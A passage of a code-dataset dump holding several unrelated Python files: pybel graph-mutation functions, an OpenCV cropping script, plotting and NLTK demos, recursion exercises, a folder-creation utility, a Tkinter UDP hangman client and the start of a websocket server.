Protein entities, adds the missing origin RNA and RNA-Protein translation edge\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n for node, data in graph.nodes(data=True):\n if data[FUNCTION] == PROTEIN and NAMESPACE in data and VARIANTS not in data:\n new_tup, new_dict = _infer_converter_helper(node, data, RNA)\n graph.add_node(new_tup, attr_dict=new_dict)\n graph.add_edge(new_tup, node, key=unqualified_edge_code[TRANSLATED_TO], **{RELATION: TRANSLATED_TO})\n\n\ndef infer_central_dogmatic_transcriptions(graph):\n \"\"\"For all RNA entities, adds the missing origin Gene and Gene-RNA transcription edge\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n for node, data in graph.nodes(data=True):\n if data[FUNCTION] == RNA and NAMESPACE in data and VARIANTS not in data:\n new_tup, new_dict = _infer_converter_helper(node, data, GENE)\n graph.add_node(new_tup, attr_dict=new_dict)\n graph.add_edge(new_tup, node, key=unqualified_edge_code[TRANSCRIBED_TO], **{RELATION: TRANSCRIBED_TO})\n\n\ndef infer_central_dogma(graph):\n \"\"\"Adds all RNA-Protein translations then all Gene-RNA transcriptions by applying\n :code:`infer_central_dogmatic_translations` then :code:`infer_central_dogmatic_transcriptions`\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n infer_central_dogmatic_translations(graph)\n infer_central_dogmatic_transcriptions(graph)\n\n\ndef opening_by_central_dogma(graph):\n \"\"\"Performs origin completion then collapsing to furthest downstream, in place\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n infer_central_dogma(graph)\n collapse_by_central_dogma(graph)\n\n\ndef opening_by_central_dogma_to_genes(graph):\n \"\"\"Performs origin completion then collapsing to gene, in place\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n infer_central_dogma(graph)\n collapse_by_central_dogma_to_genes(graph)\n\n\ndef prune_by_namespace(graph, function, namespace):\n \"\"\"Prunes all nodes of a given namespace\n\n This might be useful to exclude information learned about distant species, such as excluding all information\n from MGI and RGD in diseases where mice and rats don't give much insight to the human disease mechanism.\n\n :param graph: A BEL Graph\n :type 
graph: pybel.BELGraph\n :param function: The function to filter\n :type function: str\n :param namespace: The namespace to filter\n :type namespace: str\n \"\"\"\n to_prune = []\n\n for node, data in graph.nodes_iter(data=True):\n if function == data[FUNCTION] and NAMESPACE in data and namespace == data[NAMESPACE]:\n to_prune.append(node)\n\n graph.remove_nodes_from(to_prune)\n\n\ndef prune_by_type(graph, function=None, prune_threshold=1):\n \"\"\"Removes all nodes in graph (in-place) with only a connection to one node. Useful for gene and RNA.\n Allows for optional filter by function type.\n\n\n :param graph: a BEL network\n :type graph: pybel.BELGraph\n :param function: If set, filters by the node's function from :code:`pybel.constants` like :code:`GENE`, :code:`RNA`,\n :code:`PROTEIN`, or :code:`BIOPROCESS`\n :type function: str\n :param prune_threshold: Removes nodes with less than or equal to this number of connections. Defaults to :code:`1`\n :type prune_threshold: int\n :return: The number of nodes pruned\n :rtype: int\n \"\"\"\n to_prune = []\n\n for gene, data in graph.nodes_iter(data=True):\n if len(graph.adj[gene]) <= prune_threshold and (not function or function == data.get(FUNCTION)):\n to_prune.append(gene)\n\n graph.remove_nodes_from(to_prune)\n\n return len(to_prune)\n\n\ndef prune(graph):\n \"\"\"Prunes genes, then RNA, in place\n\n :param graph: a BEL network\n :type graph: pybel.BELGraph\n\n \"\"\"\n prune_by_type(graph, GENE)\n prune_by_type(graph, RNA)\n\n\ndef add_inferred_edges(graph, relations):\n \"\"\"Adds inferred edges based on pre-defined axioms\n\n :param graph: a BEL network\n :type graph: pybel.BELGraph\n :param relations: single or iterable of relation names to add their inverse inferred edges\n :type relations: str or list\n \"\"\"\n\n if isinstance(relations, str):\n return add_inferred_edges(graph, [relations])\n\n for relation in relations:\n for u, v in graph.edges_iter(**{RELATION: relation}):\n graph.add_edge(v, u, key=unqualified_edge_code[relation], **{RELATION: INFERRED_INVERSE[relation]})\n\n\n# TODO: Implement\ndef add_inferred_two_way_edge(graph, u, v):\n \"\"\"If a two way edge exists, and the opposite direction doesn't exist, add it to the graph\n\n Use: two way edges from BEL definition and/or axiomatic inverses of membership relations\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n :param u: the source node\n :type u: tuple\n :param v: the target node\n :type v: tuple\n \"\"\"\n raise NotImplementedError\n\n\ndef add_canonical_names(graph):\n \"\"\"Adds a canonical name to each node's data dictionary if they are missing\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n for node, data in graph.nodes_iter(data=True):\n if CNAME in data:\n log.debug('Canonical name already in dictionary for %s', data[CNAME])\n continue\n\n graph.node[node][CNAME] = calculate_canonical_name(graph, node)\n\n\ndef parse_authors(graph):\n \"\"\"Parses all of the citation author strings to lists by splitting on the pipe character \"|\"\n\n :param graph: A BEL graph\n :type graph: pybel.BELGraph\n \"\"\"\n for u, v, k in graph.edges_iter(keys=True):\n if CITATION not in graph.edge[u][v][k]:\n continue\n\n if CITATION_AUTHORS not in graph.edge[u][v][k][CITATION]:\n continue\n\n authors = graph.edge[u][v][k][CITATION][CITATION_AUTHORS]\n\n if not isinstance(authors, str):\n continue\n\n graph.edge[u][v][k][CITATION][CITATION_AUTHORS] = list(authors.split('|'))\n\n\ndef serialize_authors(graph):\n \"\"\"Recombines all authors with the 
pipe character \"|\"\n\n :param graph: A BEL graph\n :type graph: pybel.BELGraph\n \"\"\"\n for u, v, k in graph.edges_iter(keys=True):\n if CITATION not in graph.edge[u][v][k]:\n continue\n\n if CITATION_AUTHORS not in graph.edge[u][v][k][CITATION]:\n continue\n\n authors = graph.edge[u][v][k][CITATION][CITATION_AUTHORS]\n\n if not isinstance(authors, list):\n continue\n\n graph.edge[u][v][k][CITATION][CITATION_AUTHORS] = '|'.join(authors)\n","sub_path":"src/pybel_tools/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":12576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"197062590","text":"import numpy as np\r\nimport cv2\r\ndrawing = False\r\na1 = []\r\nb1 = []\r\nimg = cv2.imread('cameraman.tif',0)\r\nimg1 = cv2.imread('cameraman.tif',0)\r\nimg2 = img.copy()\r\nimg3 = img.copy()\r\nimg4 = np.zeros((1024,1024), np.uint8)\r\ndef draw_line(event,x,y,flags,param):\r\n global imgg,img,a1\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n a1.append((x,y))\r\n elif event== cv2.EVENT_LBUTTONUP:\r\n a1.append((x,y))\r\n imgg = img[a1[-2][1]:a1[-1][1], a1[-2][0]:a1[-1][0]].copy()\r\n cv2.rectangle(img, a1[-1], a1[-2],(0,0,0),3)\r\n img2 = imgg.copy()\r\n \r\ndef draw_line1(event,x,y,flags,param):\r\n global img1,imgg1,b1\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n b1.append((x,y))\r\n elif event== cv2.EVENT_LBUTTONUP:\r\n b1.append((x,y))\r\n imgg1 = img[b1[-2][1]:b1[-1][1], b1[-2][0]:b1[-1][0]].copy()\r\n cv2.rectangle(img1, b1[-2], b1[-1],(0,0,0),3)\r\n img3 = imgg1.copy()\r\n\r\ncv2.namedWindow('image')\r\ncv2.namedWindow('image1')\r\ncv2.imshow('image',img)\r\ncv2.imshow('image1',img1)\r\ncv2.moveWindow('image1', 200, 200)\r\ncv2.moveWindow('image', 10, 10)\r\ncv2.setMouseCallback('image',draw_line)\r\ncv2.setMouseCallback('image1',draw_line1)\r\n\r\nwhile(1):\r\n cv2.imshow('image',img)\r\n cv2.imshow('image1',img1)\r\n if cv2.waitKey(1) & 0xFF == 27:\r\n a = b1[-1][1]-b1[-2][1]\r\n b = b1[-1][0]-b1[-2][0]\r\n c = a1[-1][0]-a1[-2][0]\r\n d = a1[-1][1]-a1[-2][1]\r\n m = c+b\r\n \r\n if d > a:\r\n maxi = d\r\n else:\r\n maxi = a\r\n img4[0:d, 0:c] = img2[a1[-2][1]:a1[-1][1], a1[-2][0]:a1[-1][0]].copy()\r\n img4[0:a ,c:m] = img3[b1[-2][1]:b1[-1][1], b1[-2][0]:b1[-1][0]].copy()\r\n img4 = img4[0:maxi,0:m].copy()\r\n cv2.imwrite('pict_4.jpg',img4)\r\n break\r\ncv2.destroyAllWindows()\r\n\r\n","sub_path":"labworks/coi/1/my4.py","file_name":"my4.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"71397109","text":"\"\"\"\n @Time : 2020/8/6 9:13 \n @Author : fate\n @Site : \n @File : hist.py\n @Software: PyCharm\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(0)\nmu, sigma = 100, 20 # 均值 标准差\na = np.random.normal(mu, sigma, size=100)\n# print(a)\n\n# 20 == 直方图的个数\nplt.hist(a, 20, density=1, histtype='stepfilled', facecolor='b', alpha=0.75)\nplt.title('Histogram')\n\nplt.show()\n","sub_path":"数据分析/matplotlib_test/hist.py","file_name":"hist.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"426333005","text":"import nltk\nfrom nltk.corpus import brown\ncfd = nltk.ConditionalFreqDist(\n (genre,word)\n for genre in brown.categories()\n for word in brown.words(categories = genre))\ngenres = ['news', 'religion', 'hobbies', 'science_fiction', 'romance', 'humor']\nmodals = ['can', 'could', 'may', 'might', 
'must', 'will']\ncfd.tabulate(conditions = genres, samples = modals)\n'''\nObserve that the most frequent modal in the news genre is will, while the most frequent\nmodal in the romance genre is could. Would you have predicted this? The idea that\nword counts might distinguish genres will be taken up again in Chapter 6.\n'''","sub_path":"Models/nltkLearn/systematically.py","file_name":"systematically.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"185542239","text":"import os\n\nprint('''Modes of operation: \n\\n1. Manual Mode - A mode where the user provides all the names of folders and sub-folders.\n\\n2. Automatic Mode - A mode where only the name (with complete location) of the text file is \ngiven which contains a list of names for the folders and the parent folder is named after the name of the text file\\n''')\n\nmode=int(input(\"Enter Mode: \"))\n\nif mode==1:\n print('''STEPS:\n \\n1. Choose the location to make directories and/or sub-directories.\n \\n2. Enter the name of the parent directory.\n \\n3. Enter the number of sub-directories to be created\n \\n4. Give the name to the corresponding sub-directories.''')\n path = input(\"Enter Location (provide full path) \\n: \")\n if path.lower()=='this':\n path=os.getcwd()\n path = path.replace(\"/\", \"\\\\\")\n if os.path.exists(path):\n os.chdir(path)\n name = input(\"Enter name of parent directory: \")\n os.mkdir(path+\"\\\\\"+name)\n folder = int(input(\"How many folders? \\n: \"))\n for i in range(folder):\n os.mkdir(path+\"\\\\\"+name+\"\\\\\"+input(\"Folder \" + str(i+1) + \" name: \"))\n else:\n print(\"No such path exists. Provide correct path\")\n print(\"Task completed successfully\")\n\nelif mode==2:\n print(\"File(s) : \" ,[i for i in os.listdir() if os.path.isfile(i)==True])\n file=input(\"Enter file: \")\n file_=file[0:-4]+\"\\\\\"\n with open(file,'r') as f:\n if os.path.exists(file_)==False:\n os.mkdir(file_)\n for i in f.readlines():\n if '\\n' in i:\n i=i[0:-1]\n i=i.replace(\":\",\" -\")\n os.mkdir(file_+i)\n print(\"Task completed successfully\")\nelse:\n print(\"Error: Wrong option provided\")\n","sub_path":"set_folders_for_me/set_folders_for_me.py","file_name":"set_folders_for_me.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"375857149","text":"# There are comments with the names of\n# the required functions to build.\n# Please paste your solution underneath\n# the appropriate comment.\n\n# factorial\ndef factorial(n):\n if n < 0:\n raise ValueError\n elif n == 0:\n return 1\n\n return factorial(n-1) * n\n\n# reverse\ndef reverse(text):\n if len(text) == 0 or len(text) == 1:\n return text\n \n return text[-1] + reverse(text[:-1])\n \n\n# bunny\ndef bunny(count):\n if count == 0:\n return 0\n \n return 2 + bunny(count-1)\n \n\n# is_nested_parens\n\ndef is_nested_parens(parens, left_index=0):\n right_index = len(parens) - 1 - left_index\n\n if not parens or left_index > right_index:\n return True\n \n elif parens[left_index] == \"(\" and parens[right_index] == \")\":\n return is_nested_parens(parens, left_index+1)\n \n else:\n return False\n \n","sub_path":"part-1.py","file_name":"part-1.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"8939873","text":"import socket\nimport threading\nimport time , sys\nimport tkinter 
as tk\nfrom tkinter import messagebox\n\nglobal name #nombre del hilo que esta siendo usado\nglobal quit #si un jugador decide dejar el juego, esta variable será True\nglobal actualwrd #palabra puesta actualmente\nglobal word_set #Checa si una palabra esta puesta o no(True o False)\nglobal used_bar #Barra donde van las letras usadas (borra las letras cuando es False)\nglobal counter #Contador de intentos hasta que termine el juego\n\n##--------------------------------------------------------------------------------\n# inicialización de variables globales\n##--------------------------------------------------------------------------------\n\ncounter = 0\nword_set = 'False'\nused_bar = 'False'\nactualwrd = '*'\nname = ''\nquit = False\nservername = '127.0.0.1'\nport = 0\nserverport = 12000\n\n##--------------------------------------------------------------------------------\n# declaración de funciones\n#---------------------------------------------------------------------------------\n# Esta función manejará la recepción de los mensajes del servidor.\n# Y los imprimirá en la GUI.\n# Esta función es un hilo aparte y recibe el nombre de la ventana donde debe imprimir (chat),\n# un socket (sock) y un parametro en blanco (name).\n# Decodifica los comandos recibidos del servidor y los ejecuta.\n#---------------------------------------------------------------------------------\ndef recieveMsg( name , sock , chat ):\n print(\"Iniciado\")\n global quit, block, word_set, usedletter, actualwrd\n text = tk.Text(chat , width = 50 , height = 20 , yscrollcommand = s.set )\n s.config( command = text.yview)\n text.pack(side = tk.LEFT)\n while quit == False:\n try:\n msg, addr = sock.recvfrom( 1024 )\n message = msg.decode()\n tokens = message.split()\n #print(message + \" DEL SERVER\") #Para identificar los mensajes del servdidor\n except ConnectionResetError:\n print(\"Error del hilo\")\n message = messagebox.showerror(\"Error de Conexión!\" , \"No se logró una conexión...\")\n break\n if tokens[0] == 'CNTR' :\n counter = tokens[1]\n if counter == '6':\n canvas.delete(\"all\")\n canvas.create_image(175,125, image = img1 ) \n if counter == '5':\n canvas.create_image(175,125, image = img2 )\n if counter == '4':\n canvas.create_image(175,125, image = img3 )\n if counter == '3':\n canvas.create_image(175,125, image = img4 )\n if counter == '2':\n canvas.create_image(175,125, image = img5 )\n if counter == '1':\n canvas.create_image(175,125, image = img6 )\n if counter == '0':\n canvas.create_image(175,125, image = img7 )\n if counter == 'W':\n canvas.create_image(175,125, image = img8 )\n elif tokens[0] == 'SETWRD':\n #print(\"MANDE SETWORD\") #Para debugging\n block.delete(1.0 , 'end')\n block.insert(tk.INSERT , tokens[1])\n elif tokens[0] == 'SETWRD2':\n check_set(tokens[2])\n #print(\"MANDE SETWORD2\") #debugging\n block.delete(1.0 , 'end')\n block.insert(tk.INSERT , tokens[1])\n elif tokens[0] == 'UPDATEWRD':\n check_set(tokens[2])\n #print(\"MANDE UDPATE\") #debugging\n actualwrd = tokens[1]\n elif tokens[0] == 'RLET':\n global used_bar\n if(used_bar == 'False'):\n usedletter.delete(1.0 , 'end')\n used_bar = 'True'\n #print(\"MANDE RLET\") #debugging\n letter = tokens[1].upper()\n usedletter.insert(tk.INSERT , letter )\n elif message != \"QUITCOMM\":\n #Imprimimos lo que quede en el chat\n text.insert(tk.INSERT , message)\n text.see(tk.END)\n else:\n quit = True\n print(\"Hilo terminado\")\n\n#---------------------------------------------------------------------------------\n# Esta función se ejecutará 
cuando des click en el botón 'Enviar' ya que hayas ingresado un nombre\n# Conecta al cliente con el servidor.\n#---------------------------------------------------------------------------------\ndef submit():\n global name\n userName = user.get()\n name = userName\n if len(userName) > 0: \n try:\n clientsock.sendto(userName.encode(), (servername , serverport))\n except ConnectionResetError:\n print(\"Error de conexión!\")\n root.destroy()\n menu_w.destroy()\n else:\n disp_name_error()\n\n#---------------------------------------------------------------------------------\n# Esta funcion se ejecutará cuando des 'Enter' (en el teclado) ya que hayas ingresado un nombre de usuario.\n# Conecta al cliente con el servidor\n#---------------------------------------------------------------------------------\ndef submitenter(event):\n global name\n userName = user.get()\n name = userName\n if len(userName) > 0: \n try:\n clientsock.sendto( userName.encode() , (servername , serverport) )\n except ConnectionResetError:\n print(\"Error de conexión!\")\n root.destroy()\n menu_w.destroy()\n else:\n disp_name_error()\n\n#---------------------------------------------------------------------------------\n# Esta función enviará los mensajes escritos en la ventana de chat cuando le des\n# click al botón 'Enviar'.\n# Estos mensajes serán broadcasteados a todos los demás jugadores.\n# Los mensajes son enviados con la forma [jugador]: 'mensaje' \n# Si no hay nada en la caja de texto, no se envia nada.\n#---------------------------------------------------------------------------------\ndef chatsend():\n global name \n message = msg.get()\n if len(message) > 0: \n line = \"[\" + name + \"]: \" + message + \"\\n\"\n clientsock.sendto( line.encode() , (servername , serverport) )\n msg.delete(0 , 'end')\n\n#---------------------------------------------------------------------------------\n# Esta función enviará los mensajes escritos en la ventana de chat cuando presiones\n# 'enter'.\n# Estos mensajes serán broadcasteados a todos los demás jugadores.\n# Los mensajes son enviados con la forma [jugador]: 'mensaje' \n# Si no hay nada en la caja de texto, no se envia nada.\n#---------------------------------------------------------------------------------\ndef enter(event):\n global name\n message = msg.get()\n if len(message) > 0: \n line = \"[\" + name + \"]: \" + message + \"\\n\"\n clientsock.sendto( line.encode() , (servername , serverport) )\n msg.delete(0 , 'end')\n\n#---------------------------------------------------------------------------------\n# Error catching por si el usuario no pone un nombre de usuario\n#---------------------------------------------------------------------------------\ndef disp_name_error():\n messagebox.showerror(\"Sin nombre!\" , \"Por favor, ingresa tu nombre\\n\")\n\n#---------------------------------------------------------------------------------\n# Si un jugador decide salir del juego envia un comando al server con la forma\n# '[jugador]: ^q'\n# El comando '^q' es cachado y ejecutado por el server \n#---------------------------------------------------------------------------------\ndef quitchat():\n line = \"[\" + name + \"]: ^q \\n\"\n clientsock.sendto( line.encode() , (servername , serverport) )\n chat.destroy()\n\n#---------------------------------------------------------------------------------\n# Esta función es el pop up para que el usuario ingrese una palabra para adivinar\n#---------------------------------------------------------------------------------\ndef set_word():\n 
global wordwindow \n global input\n wordwindow = tk.Tk()\n wordwindow.title(\"Escoge una palabra difícil (Pero bien escrita!)\")\n wordwindow.minsize(width = 200, height =50)\n wordlabel = tk.Label( wordwindow, text = \"Ingresa tu palabra: \")\n wordlabel.pack(side = tk.LEFT)\n input = tk.Entry( wordwindow )\n input.pack(side = tk.LEFT)\n button = tk.Button( wordwindow , text = \"Poner\", width = 20 , command = wordsend )\n button.pack(side = tk.LEFT)\n wordwindow.mainloop()\n\n#---------------------------------------------------------------------------------\n# Esta función se ejecuta al darle click en 'Poner' en la 'wordwindow' (pop up arriba)\n# Envía el comando al server con la forma '[player]: SETWRD palabra'\n# Aquí modificamos 'word_set' Si es falso no hay palabra colocada y puedes ponerla\n# Si es verdadero muestra que no es tu turno para ponerla y que ya hay una.\n#---------------------------------------------------------------------------------\ndef wordsend():\n global block , word_set\n word = input.get()\n tokens = word.split()\n if (len(tokens[0]) > 0):\n if word_set == 'False': \n print(\"Boton picado\")\n block.delete(1.0 , 'end')\n block.insert(tk.INSERT , tokens[0])\n command = \"[\" + name + \"]: SETWRD \" + tokens[0] \n clientsock.sendto( command.encode() , (servername , serverport))\n else:\n messagebox.showerror(\"Palabra ya puesta!!\" , \"No es tu turno de poner una palabra, espera tu turno!\")\n wordwindow.destroy()\n\n#---------------------------------------------------------------------------------\n# Esta función es el pop up para que el jugador adivine la palabra completa\n#---------------------------------------------------------------------------------\n\ndef guess_word():\n global guess \n global guessinput\n guess = tk.Tk()\n guess.title(\"¿Te la sabes?\")\n tk.Label(guess , text = \"Intento: \" ).pack(side = tk.LEFT)\n guessinput = tk.Entry( guess )\n guessinput.pack( side = tk.LEFT)\n tk.Button(guess , text = \"Será?...\" , command = send_guess).pack(side = tk.LEFT)\n guess.mainloop()\n\n#---------------------------------------------------------------------------------\n# Esta función es ejecutada cuando le das click al botón 'Será?...' del pop up para\n# adivinar de arriba\n# Envia el comando al server con la forma '[jugador]: GUESSWRD palabra'\n#---------------------------------------------------------------------------------\ndef send_guess():\n gword = guessinput.get()\n tokens = gword.split()\n if( len(tokens[0]) > 0 ):\n command = \"[\" + name + \"]: GUESSWRD \" + tokens[0] \n clientsock.sendto( command.encode() , (servername , serverport) )\n guess.destroy()\n\n#---------------------------------------------------------------------------------\n# Esta función es para que el jugador adivine una letra (abre un pop up)\n#---------------------------------------------------------------------------------\ndef guess_letter():\n global letter \n global letterinput\n letter = tk.Tk()\n letter.title(\"Adivina por letra\")\n tk.Label(letter , text = \"letra: \" ).pack(side = tk.LEFT)\n letterinput = tk.Entry( letter , width = 20 )\n letterinput.pack( side = tk.LEFT)\n tk.Button(letter , text = \"¿Estará?...\" , command = send_letter).pack(side = tk.LEFT)\n letter.mainloop()\n\n#---------------------------------------------------------------------------------\n# Esta función es ejecutada cuando le das en el botón '¿Estará?...' del pop up de\n# arriba. 
Envia el comando al server con la forma '[jugador]: RLET letra'\n# Antes de enviar el comando checa si solo metió un caracter para evitar errores.\n# No checa si es una letra, solo si es un solo caracter. (Por las ñ y acentos)\n#---------------------------------------------------------------------------------\ndef send_letter():\n gletter = letterinput.get()\n tokens = gletter.split()\n if( len(tokens[0]) == 1 ):\n command = \"[\" + name + \"]: RLET \" + tokens[0] \n clientsock.sendto( command.encode() , (servername , serverport) )\n letterinput.delete(0 , 'end')\n\n#---------------------------------------------------------------------------------\n# Esta función checa y coloca el indicador de que una palabra fue puesta y si la\n# barra de letras usadas debe ser limpiada\n#---------------------------------------------------------------------------------\ndef check_set( word ):\n global used_bar, word_set\n word_set = word\n if (word == 'False'):\n used_bar = 'False'\n\ndef randomwrd():\n if word_set == 'False': \n command = \"[\" + name + \"]: RANDOMWRD\" \n clientsock.sendto(command.encode() , (servername , serverport))\n else:\n messagebox.showerror(\"Palabra ya puesta!!\" , \"No es tu turno de poner una palabra, espera tu turno!\")\n\ndef connect():\n #Para la primera ventana. Pide un nombre de usuario\n global root , user\n root = tk.Tk()\n root.title(\"Bienvenido!\")\n welcomelabel = tk.Label(root , text = \"Bienvenido a la sala de chat!!\")\n welcomelabel.grid(row = 1 , columnspan = 3)\n userlabel = tk.Label(root , text = \"Nombre:\")\n userlabel.grid(row = 3, column = 0)\n user = tk.Entry(root)\n user.bind(\"\" , submitenter)\n user.grid(row = 3 , column = 1)\n submit_button = tk.Button(root, text = \"Enviar\", command = submit)\n submit_button.grid(row = 3 , column = 2)\n root.mainloop()\n\ndef menu():\n global menu_w\n menu_w = tk.Tk()\n menu_w.title(\"Bienvenido a Captious\")\n menu_w.maxsize(width = 305 , height = 230)\n menu_w.geometry(\"305x230+%d+%d\" % ((500) , (250)) )\n img = tk.PhotoImage( file = \"images/welcome.png\")\n welcome_canvas = tk.Canvas(menu_w , bg = 'blue' , width = 300 , height = 200 )\n welcome_canvas.pack(side = tk.TOP)\n welcome_canvas.create_image( 152 , 102 , image = img)\n play = tk.Button(menu_w , command = connect)\n play.pack(side = tk.LEFT)\n play.config(text = \"Jugar\", width = 8)\n help = tk.Button(menu_w , command = disp_help )\n help.pack(side = tk.LEFT)\n help.config(text = \"Reglas\", width = 8)\n esc = tk.Button(menu_w , command = quit_game)\n esc.pack(side = tk.LEFT)\n esc.config(text = \"Salir\", width = 8)\n menu_w.mainloop()\n\ndef disp_help():\n messagebox.showinfo(\"Ayuda\" , \"Reglas del juego:\\n\\n\" +\n \"-El punto del juego es adivinar la palabra puesta por un jugador\" +\n \" antes de que te quedes sin intentos.\\n\\n\" +\n \"-Un jugador tendrá la opción de poner una palabra propia \" +\n \"o de escoger una palabra aleatoria de la base de datos.\\n\\n\" +\n \"-Si es tu turno de adivinar, puedes dar click en 'Adivinar Letra' para intentar con una letra especifica\" + \n \" o puedes dar click en 'Adivinar Palabra' si crees saber la\" +\n \" palabra completa.\\n\\n\" +\n \"-Si adivinas la palabra, ganarás la ronda y una nueva palabra puede ser puesta.\\n\\n\" +\n \"-Si te quedas sin intentos quedarás AHORCADO y el juego termina.\\n\\n\" +\n \"-CASTIGOS:\\n-1 por una letra mal adivinada.\\n-2 por una palabra mal adivinada.\\n\\n\")\n\ndef quit_game():\n 
\ndef quit_game():\n    sys.exit(0)\n\n#---------------------------------------------------------------------\nclientsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nclientsock.bind((servername , port))\nmenu()\nuserlength = len(name)\nif userlength > 0:\n    global msg, canvas, img1 , img2 , img3 , img4 , img5 , img6 , img7\n    chat = tk.Tk()\n    img1 = tk.PhotoImage(file = 'images/hng1.png') \n    img2 = tk.PhotoImage(file = 'images/hng2.png') \n    img3 = tk.PhotoImage(file = 'images/hng3.png') \n    img4 = tk.PhotoImage(file = 'images/hng4.png') \n    img5 = tk.PhotoImage(file = 'images/hng5.png')\n    img6 = tk.PhotoImage(file = 'images/hng6.png') \n    img7 = tk.PhotoImage(file = 'images/hng7.png') \n    img8 = tk.PhotoImage(file = 'images/hng8.png')\n\n    chat.title(\"Captious Chat\")\n    chat.minsize( width = 735 , height = 330 )\n    chat.geometry(\"740x450+%d+%d\" % ((300) , (250)) )\n\n    hangman = tk.Label(chat , text = \"Bienvenido a Captious, \" + name + \"!!\\n\" , font = (\"Arial\" , 15) )\n    hangman.pack(side = tk.TOP)\n\n    topframe = tk.Frame(chat , bg = \"green\")\n    topframe.pack( side = tk.TOP)\n\n    bottomframe = tk.Frame(chat , height = 30)\n    bottomframe.pack( side = tk.BOTTOM )\n\n    sideframe = tk.Frame(topframe , bg = \"green\" , bd = 6 , width = 80 , height = 40)\n    sideframe.pack(side = tk.RIGHT)\n\n    s = tk.Scrollbar(topframe)\n    s.pack(side = tk.RIGHT , fill = tk.Y)\n\n    chatlabel = tk.Label(bottomframe , text = \"Tu: \")\n    chatlabel.pack( side = tk.LEFT)\n\n    msg = tk.Entry(bottomframe , width = 50)\n    msg.bind(\"<Return>\" , enter)\n    msg.pack(side = tk.LEFT)\n\n    chatbutton = tk.Button(bottomframe, text = \"Enviar\" , command = chatsend , height = 20 , width = 20)\n    chatbutton.pack(side = tk.LEFT)\n\n    quitbutton = tk.Button(bottomframe, text = \"Salir\" , command = quitchat , height = 20 , width = 10)\n    quitbutton.pack(side = tk.BOTTOM)\n\n    rt = threading.Thread(target = recieveMsg , args = (\"Thread\" , clientsock , topframe))\n    rt.start()\n\n    block = tk.Text( sideframe , width = 24 , height = 1 , bg = \"grey\")\n    block.grid( row = 1 , column = 1 , sticky = tk.E)\n    block.insert(tk.INSERT , \"Sin palabra\")\n\n    setbutton = tk.Button(sideframe , text = \"Poner Palabra\", command = set_word)\n    setbutton.grid(row = 1 , column = 0 , sticky = tk.W)\n\n    guessbutton = tk.Button(sideframe , text = \"Adivinar Palabra\", command = guess_word)\n    guessbutton.grid( row = 2 , column = 0 , sticky = tk.W)\n\n    letter = tk.Button(sideframe, text = \"Adivinar Letra\", command = guess_letter)\n    letter.grid(row = 3 , column = 0 , sticky = tk.W)\n\n    randombutton = tk.Button(sideframe , text = \"Palabra Aleatoria\" , command = randomwrd )\n    randombutton.grid( row = 3 , column = 1 , sticky = tk.E)\n\n    usedletter = tk.Text(sideframe , width = 40, height = 1 , bg = \"grey\")\n    usedletter.grid(row = 4 , columnspan = 2 , sticky = tk.E)\n    usedletter.insert(tk.INSERT , \"Las letras usadas aparecerán aquí...\")\n\n    canvas = tk.Canvas(sideframe ,width = 350 , height = 250 )\n    canvas.grid( row = 5 , columnspan = 2)\n    \n    # The two coordinates (175, 125) place the centre of the image on the canvas\n    canvas.create_image(175,125, image = img1)\n    chat.mainloop()\n\nrt.join()\nclientsock.close()\n
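\n# Usage note: this file assumes 'name', 'servername', 'serverport', 'port' and the\n# helpers 'submit', 'submitenter', 'enter', 'chatsend', 'quitchat' and 'recieveMsg'\n# are defined in the earlier (not shown) part of the script, and that a matching\n# Captious UDP server is running.\n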
","sub_path":"CaptiousClient.py","file_name":"CaptiousClient.py","file_ext":"py","file_size_in_byte":18507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"166001901","text":"import asyncio\nimport websockets\nimport json\n\n# Imports of Components\nfrom server.components.components import greeting\nfrom server.components.components import main\nfrom server.components.components import input_temp_preference\n\n# Custom-Imports\nfrom server import constants\nfrom server.store import Store\n\n\n\"\"\"\nMessage shapes (angle brackets mark placeholders):\n--> {\"func\": \"<func>\", \"id\": <id>, \"payload\": {...}}\n<-- {\"parent\": \"<parent>\", \"id\": <id>, \"html\": \"<html>\"}\n\"\"\"\n\nclass Server:\n    def __init__(self, store):\n        self.store = store\n\n    def get_port(self):\n        #return os.getenv('WS_PORT', '8765')\n        return constants.SERVER_BINDING_PORT\n\n    def get_host(self):\n        #return os.getenv('WS_HOST', 'localhost')\n        return constants.SERVER_BINDING_INTERFACE\n\n    def start(self):\n        return websockets.serve(self.handler, self.get_host(), self.get_port())\n\n    async def handler(self, websocket, path):\n        async for message in websocket:\n            print('server received :', message)\n            #await websocket.send(message)\n            data = json.loads(message)\n\n            if data['func'] in constants.PROCEDURES:\n\n                if data['func'] == 'MAIN':\n                    print('> Greeting Message erhalten. > ' + message)\n                    response_dict = {\n                        'parent': \"root\",\n                        'id': data['id'],\n                        'html': main(self.store.getall())\n                    }\n                    await websocket.send(json.dumps(response_dict))\n\n                elif data['func'] == 'SHOW_VIEW_ADD_PREFERENCE':\n                    print('> 